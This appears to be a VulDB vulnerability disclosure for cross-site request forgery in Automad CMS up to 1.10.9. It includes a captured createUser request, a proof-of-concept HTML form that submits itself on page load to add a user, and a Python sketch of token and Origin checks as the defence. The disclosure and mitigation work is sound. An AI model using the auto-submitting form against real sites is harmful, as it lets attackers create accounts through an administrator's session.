| Title | Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF) |
|---|---|
| Description | Testing showed that the application does not implement CSRF tokens by default, making its state-changing dashboard actions vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is one of the action requests, captured while adding a user, followed by the proof-of-concept HTML. |

```http
POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd
```

CSRF HTML:

```html
<html>
<body>
<form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
<input type="hidden" name="username" value="User" />
<input type="hidden" name="email" value="User@example.com" />
<input type="hidden" name="password1" value="Passw0rd" />
<input type="hidden" name="password2" value="Passw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
```
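As an added illustration (not Automad's code and not part of the original submission), the following Python sketch shows the check the description says is missing: a random per-session synchronizer token that every state-changing POST must carry, validated in constant time, with an Origin/Referer check as a second, independent layer. The request text inside the block is a constructed copy of the captured request above with the cookie value redacted; the session store, the `evil.example` origin and all function names are assumptions made for the example.

```python
"""Illustrative CSRF defence for a form-driven dashboard action.

Synchronizer-token pattern plus an Origin check. Hypothetical code written
for this page; it is not the CMS's implementation.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# The application's own origin, taken from the captured request on the page.
SITE_ORIGIN = "http://automad.scr"

# Constructed copy of the captured request (headers trimmed, cookie redacted).
CAPTURED_REQUEST = (
    "POST /dashboard?controller=UserCollection::createUser HTTP/1.1\r\n"
    "Host: automad.scr\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "X-Requested-With: XMLHttpRequest\r\n"
    "Origin: http://automad.scr\r\n"
    "Referer: http://automad.scr/dashboard?view=System\r\n"
    "Cookie: Automad-session=REDACTED\r\n"
    "\r\n"
    "username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def new_session(user):
    """Create a server-side session carrying a random per-session CSRF token."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}


def request_origin(headers):
    """Origin header if present, else scheme+host of the Referer, else None."""
    if "origin" in headers:
        return headers["origin"]
    ref = headers.get("referer")
    if ref:
        p = urlsplit(ref)
        return f"{p.scheme}://{p.netloc}"
    return None


def verify_state_change(session, raw_request):
    """Return (accepted, reason) for a state-changing request.

    Two independent checks: the request must come from the site's own origin
    (a missing Origin/Referer is rejected), and the form must carry the
    session's token, compared in constant time.
    """
    method, _path, headers, body = parse_request(raw_request)
    if method != "POST":
        return False, "state changes must use POST"
    if request_origin(headers) != SITE_ORIGIN:
        return False, "cross-site origin"
    form = parse_qs(body, keep_blank_values=True)
    token = form.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "missing or invalid csrf token"
    return True, "accepted"


def demo():
    """Exercise the three cases a reviewer would want to see."""
    session = new_session("admin")
    # 1. The captured request as-is: same origin, but no token -> rejected.
    unprotected = verify_state_change(session, CAPTURED_REQUEST)
    # 2. The PoC form submitted from another site: the browser sets a foreign
    #    Origin/Referer (evil.example is a constructed placeholder) -> rejected.
    forged = verify_state_change(
        session,
        CAPTURED_REQUEST
        .replace("Origin: http://automad.scr", "Origin: http://evil.example")
        .replace("Referer: http://automad.scr/dashboard?view=System",
                 "Referer: http://evil.example/"),
    )
    # 3. Same request with the session's token in the form body -> accepted.
    fixed = verify_state_change(
        session, CAPTURED_REQUEST + "&csrf_token=" + session["csrf_token"]
    )
    return {"unprotected": unprotected, "forged": forged, "fixed": fixed}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name:12} {'ACCEPT' if ok else 'REJECT'}  {why}")
```

The first case is the state the submission describes: the request is genuinely same-origin yet carries nothing that ties it to the session, so the token check is what rejects it. Note that the captured request includes `X-Requested-With: XMLHttpRequest`, a header a plain HTML form like the PoC cannot set; its presence in the legitimate request does not mean the server requires it, and requiring a custom header is a weaker control than the per-session token shown here.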
| Field | Value |
|---|---|
| Source | ⚠️ https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF) |
| User | Maland (UID 59886) |
| Submission | 09/12/2023 06:15 PM (3 years ago) |
| Moderation | 21/12/2023 09:19 AM (12 days later) |
| Status | Accepted |
| VulDB Entry | 248687 [automad up to 1.10.9 User Creation dashboard?controller=UserCollection::createUser cross site request forgery] |
| Points | 20 |